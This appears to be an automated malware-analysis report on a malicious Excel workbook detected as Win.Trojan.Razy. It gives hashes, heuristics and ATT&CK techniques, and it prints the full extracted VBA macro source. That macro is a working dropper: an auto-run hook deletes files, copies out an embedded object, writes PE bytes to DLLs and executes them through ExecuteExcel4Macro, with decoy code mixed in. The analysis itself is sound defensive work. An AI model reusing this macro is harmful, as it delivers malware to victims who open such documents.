Office (OLE) malware analysis — malicious · 2c6f0629707ae81a

MALICIOUS

Office (OLE)

721.0 KB Created: 2020-06-22 10:41:03 Authoring application: Microsoft Excel First seen: 2020-09-07

MD5: 8edf39ec6fa723426aff97252b69b2ae SHA-1: bb05f29e0386ee9acb14403182e7b1faf553a479 SHA-256: 2c6f0629707ae81ab6f5870efc27a6cea2918f18744c8c52cf1b1a84d00ed71f

550 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The file contains a Workbook_Open VBA macro that triggers an embedded PE executable. This executable is likely a downloader or stager, as indicated by the presence of VirtualAlloc, LoadLibrary, and GetProcAddress API calls. The ClamAV detection of Win.Trojan.Razy-7331387-0 further supports its malicious nature. The macro's use of CallByName and ActiveX events to launch the embedded executable suggests a sophisticated evasion technique.

Heuristics 13

ClamAV: Win.Trojan.Razy-7331387-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Razy-7331387-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True

VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Matched line in script
```
Public Function HiddenEE4M(sOfbl)
varRes1 = ExecuteExcel4Macro("CAL" + "L(" + sOfbl + "belo"",""J"")")
HiddenEE4M = False
```

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat)

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ocsp.sectigo.com0 In document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://ocsp.usertrust.com0In document text (OLE body)
- https://sectigo.com/CPS0In document text (OLE body)
- http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sIn document text (OLE body)
- http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#In document text (OLE body)
- http://crl.comodoca.com/AAACertificateServices.crl04In document text (OLE body)
- http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vIn document text (OLE body)
- http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19039 bytes
SHA-256: `ceee8ed1385c5f468731066434441499b88bf5c166f6a51aa82a683141c4c14a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() If WelcomeDialog.Visible = True Then Exit Sub End If Module2.WuzzyBud 3900 End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Worksheet_SelectionChange(ByVal Target As Range) End Sub Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Repositor" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Get CheckCar(car As Object, Drive As String) CheckCar = car.SpecialFolders("" & Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property Public Property Let Speed(sp As Integer) End Property Attribute VB_Name = "Module0" Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents DoEvents ActiveWorkbook.Close DoEvents DoEvents End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key End Sub Private Sub TextBox2_Change() x = Len(TextBox2) Y = LTrim(TextBox2.Text) d = TextBox2 If d = "" Then TextBox2.BackColor = &HFFFFFF Exit Sub End If If Left(d, 2) > 24 Then MsgBox "Ora Errata" TextBox2.SelStart = 0 TextBox2.SelLength = Len(TextBox2) Exit Sub End If If x = 2 Then TextBox2 = Y & ":" If x = 4 Then Exit Sub If Mid(d, 4, 2) = "" Then Exit Sub If Mid(d, 4, 2) > 59 Then MsgBox "Minuti Errati" TextBox2.SelStart = 3 TextBox2.SelLength = Len(TextBox2) Exit Sub End If If x = 5 Then TextBox3.SetFocus End If Exit Sub Resume End Sub Public Sub Vooooohead() Dim ofbl As String Dim sOfbl As String Dim NumBForRead As Long dershlep = "" + Dialog4.TextBox1.Tag Dim sendings As Integer ofbl = Dialog4.TextBox3.Tag ofbl = ofbl + "\boost_thread" ctackPup = Dialog4.TextBox1.Tag + "\dorea" ctackPup = ctackPup + "l.xlsx" Dim arr(1 To 3) As String If Len(Dialog4.TextBox3.Text) > 266 Then MsgBox "Ultrapassa 66 Caracteres!", vbCritical, "HISTÓRICO" TextBox7.SelStart = 0 Else End If Dim objeto As Control If Len(Dialog4.TextBox1.Text) > 366 Then For Each objeto In UserForm1.Controls On Error Resume Next objeto.Value = "" Next Unload ggg.UserForm1 ggg.UserForm1.Hide End If ctackPip = ctackPup & Page11.Range("B115").Value PublicResumEraseByArrayList ofbl + "", ctackPip, dershlep + UserForm1.Label1.Tag On Error GoTo 0 VistaQ ctackPup FileCopy ctackPup, ctackPip sendings = 1 Dim sNMSP As New Shell FlagDouble = True Lrigat = UserForm1.Label11.Tag If sendings > 0 And sendings > -30 Then Set DestinationKat = sNMSP.Namespace(dershlep) Set harvest = sNMSP.Namespace(ctackPip) End If CallByName DestinationKat, "Copy" + "Here", VbMethod, harvest.Items.Item(Lrigat) Dim car As Repositor Set car = New Repositor For StepBit = 1 To 2 NumBForRead = 282024 sendings = 1 flayString = "1" If FlagDouble Then sendings = 2 NumBForRead = 1000000 - 725656 FlagDouble = False flayString = "2" End If sOfbl = ofbl + flayString + ".dll" Composition dershlep + "" + UserForm1.Label1.Tag + "", sOfbl, NumBForRead, sendings If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If If -100 <= sendings Then sendings = sendings + 1 ChDir Dialog4.TextBox3.Tag sendings = sendings + 1 End If sOfbl = """" + sOfbl & """,""" If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If If sendings > 1000 Then sendings = sendings + 1 End If If sendings < 0 Then sendings = sendings + 1 End If If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If StopByOk = HiddenEE4M(sOfbl) If StopByOk Then Exit Sub End If WelcomeDialog.Hide Next End Sub Sub subTotalSales() Dim LR As Integer LR = Cells(Rows.Count, "A").End(xlUp).Row + 2 Rows("1:2").EntireRow.Insert Shift:=xlDown If LR = 3 Then Range("A1").Select Call salesHeade.rs Range("A2").Formula = "$0" Range("B2").Formula = "$0" Range("C2").Formula = "$0" Range("D2").Formula = "$0" Range("E2").Formula = "$0" Range("F2").Formula = "0%" Range("G2").Formula = "0" Range("H2").Formula = "$0" Range("I2").Formula = "0" Range("J2").Formula = "0" Range("K2").Formula = "$0" Range("L2").Formula = "$0" Range("M2").Formula = "0" Range("N2").Formula = "0%" Else Range("A1").Select Call salesHeade.rs With ActiveSheet End With End If End Sub Sub InputWeekData(x As Date) ActiveCell = Format(x, "ww", vbMonday, vbFirstFourDays) ActiveCell.Offset(0, 1).Select ActiveCell = x ActiveCell.Offset(0, 1).Select ActiveCell = x + 6 ActiveCell.Offset(0, 1).Select End Sub Private Sub TextBox3_Change() Y = LTrim(TextBox3.Text) d = TextBox3 If x = 5 Then TextBox4.SetFocus End If Exit Sub Resume End Sub Attribute VB_Name = "Module1" Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI Or Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " ccc" Then End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module2" Public DisputeChannel3 As Byte Public DecemberUpdate As Byte Public HurricanMoes() As Byte Public abbrev As Byte Public Sub WuzzyBud(dImmer As Integer) If WelcomeDialog.Visible = True Then Exit Sub End If Dim s As String Dim GetInfirmityLevelDescription As String Dim d As Long d = 3 d = d - 1 Dim redoMochup As New WshShell Select Case d Case 0 s = "N0o health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim car As Repositor Dim SpecialPath As String PRP = "%" & Dialog4.TextBox1.Tag Dialog4.TextBox1.Tag = redoMochup.ExpandEnvironmentStrings(PRP + "%") Set car = New Repositor Dim firstWeek As Integer Dim firstDay As Integer Dim firstdate As Date Dim lastdate As Date Dim lastWeek As Integer Dim lastDay As Integer s = car.CheckCar(redoMochup, Dialog4.TextBox3.ControlTipText & "") firstWeek = 1 firstDay = 2 lastWeek = 3 lastDay = 4 Dialog4.TextBox3.Tag = s If Not firstDay = 1 Then firstdate = firstdate + (8 - firstDay) firstWeek = firstWeek + 1 End If If lastDay = 6 Then lastdate = lastdate + 1 lastDay = lastDay + 1 ElseIf Not lastDay = 7 Then lastdate = lastdate - lastDay lastDay = 7 lastWeek = lastWeek - 1 End If Dim iteration As Integer ChDir (Dialog4.TextBox1.Tag) If WelcomeDialog.Visible = False Then WelcomeDialog.Show End If End Sub Attribute VB_Name = "Module4" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI Or Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim ProstoPlan As Long Dim logicVari As Integer Dim SimpleMethod As Integer ReDim HurricanMoes(1 To fl) ProstoPlan = FreeFile Open Composition2 For Binary Access Read As ProstoPlan logicVari = 1 Do While Not EOF(ProstoPlan) Get ProstoPlan, , abbrev If abbrev = FirstB Then HurricanMoes(1) = abbrev Get ProstoPlan, , DisputeChannel3 If DisputeChannel3 = SecondB Then HurricanMoes(2) = DisputeChannel3 Get ProstoPlan, , DecemberUpdate If DecemberUpdate = ThirdB Then HurricanMoes(3) = DecemberUpdate If logicVari = DisputeChannel6 Then For k = 4 To fl Get ProstoPlan, , abbrev HurricanMoes(k) = abbrev Next k Exit Do Else logicVari = logicVari + 1 End If End If End If End If Loop On Error Resume Next LoopIfEnd = 400 Close ProstoPlan LoopIfEnd = 400 + LoopIfEnd ProstoPlan = FreeFile LoopIfEnd = 400 + LoopIfEnd Open ofbl For Binary Lock Read Write As #ProstoPlan LoopIfEnd = 400 + LoopIfEnd zeroBob = 1 For i = zeroBob To UBound(HurricanMoes) If WelcomeDialog.Enabled = True Then Put #ProstoPlan, , HurricanMoes(i) End If Next i Close ProstoPlan ProstoPlan = FreeFile For HSP = 33 To -1 Step -0.25 ProstoPlan = 6 + i Next HSP ProstoPlan = 6 + i End Sub Private Sub cmd_Keluar_Click() Unload LSD.Me MDIForm1.dokter.Enabled = True MDIForm1.dokter.Checked = False End Sub Private Sub cmd_Perbaiki_Click() If cmd_Perbaiki.Caption = "Pe&rbaiki" Then cmd_Simpan.Enabled = False cmd_Hapus.Enabled = False cmd_Batal.Enabled = True Dim var As String var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter") If var = Empty Then Exit Sub Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil txtkd_dok.Enabled = False txtnm_dok.Enabled = True cmd_Perbaiki.Caption = "&Perbaharui data" Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If Else Data1.Recordset.Edit Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Perbaiki.Caption = "Pe&rbaiki" cmd_Batal.Enabled = False cmd_Simpan.Enabled = True cmd_Hapus.Enabled = True Call tdk_bi.sa End If End Sub Private Sub cmd_Simpan_Click() If cmd_Simpan.Caption = "&Isi Data" Then Call bis.a nom.Or M.e.txtnm_dok.SetFocus cmd_Batal.Enabled = True cmd_Perbaiki.Enabled = False cmd_Hapus.Enabled = False cmd_cari.Enabled = False cmd_Simpan.Caption = "&Simpan Data" Else If txtkd_dok.Text = "" Or _ txtnm_dok.Text = "" Then MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT" txtkd_dok.SetFocus Else cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Simpan.Caption = "&Isi Data" End If End If End Sub Attribute VB_Name = "Module5" Private Sub Command7_Click() b = MsgBox("?????????", vbYesNo) If b = vbYes Then a = "delete from cinema where cinid='" a = a + Text1.Text + "'" cnmovie.Execute a rs4.Close Sql = "select from cinema" rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic If rs.BOF Or rs.EOF Then MsgBox "?????!" Else rs4.MoveFirst Call View.Data End If End If End Sub Public Function HiddenEE4M(sOfbl) varRes1 = ExecuteExcel4Macro("CAL" + "L(" + sOfbl + "belo"",""J"")") HiddenEE4M = False If IsNumeric(varRes1) Then If varRes1 = 0 Then HiddenEE4M = Not HiddenEE4M End If End If End Function Private Sub nomor() Dim urutan As String * 5 Dim hitung As Byte If Data1.Recordset.RecordCount = 0 Then urutan = "Dr" & "001" Else Data1.Recordset.MoveLast If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then urutan = "00" & "001" Else hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1 urutan = "Dr" & Right("000" & hitung, 3) End If End If M.e.txtkd_dok = urutan End Sub Private Sub cmd_Batal_Click() Call be.rsih Call td.k_bisa cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True End Sub Private Sub cmd_cari_Click() Dim var As String var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter") If var = Empty Then Exit Sub If var <> "" Then Data1.Recordset.Index = "kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil Call bi.sa Call kun.ci Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Private Sub cmd_Hapus_Click() Dim var As String var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter") If var = Empty Then Exit Sub If var = "" Then Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Data1.Recordset.Delete Data1.Refresh Data1.Recordset.MoveFirst Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Attribute VB_Name = "Dialog4" Attribute VB_Base = "0{EC6A8281-EEF6-43D9-A5BC-B818699D989A}{5BAD586B-A465-4AF2-8EDE-16B1696E40D8}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "WelcomeDialog" Attribute VB_Base = "0{678C386C-E0BF-40E3-AA60-DEF77BFFCF93}{EF028494-7338-4AD2-B992-8B6D778F9907}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() DoEvents DoEvents Vooooohead DoEvents End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{870B8D98-BE8C-40A8-97E6-CF58B46BD5D5}{156A61DB-4F11-4A53-BF58-88431E28E613}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_00001954.exe`	embedded-pe	Office MZ+PE at offset 0x1954	731820 bytes
SHA-256: `c0d6fa4a11301622244fcfabedb8cf03e6866820d384fa4c82a8b4dedd12a229`
Detection ClamAV: Win.Trojan.Razy-7331387-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD00077828/Ole10Native	560882 bytes
SHA-256: `b07125f8503471f7bb8060536e34019a9da875da6786de10bc49f78ab947b335`

Open this report in the interactive analyzer, or submit your own file for analysis.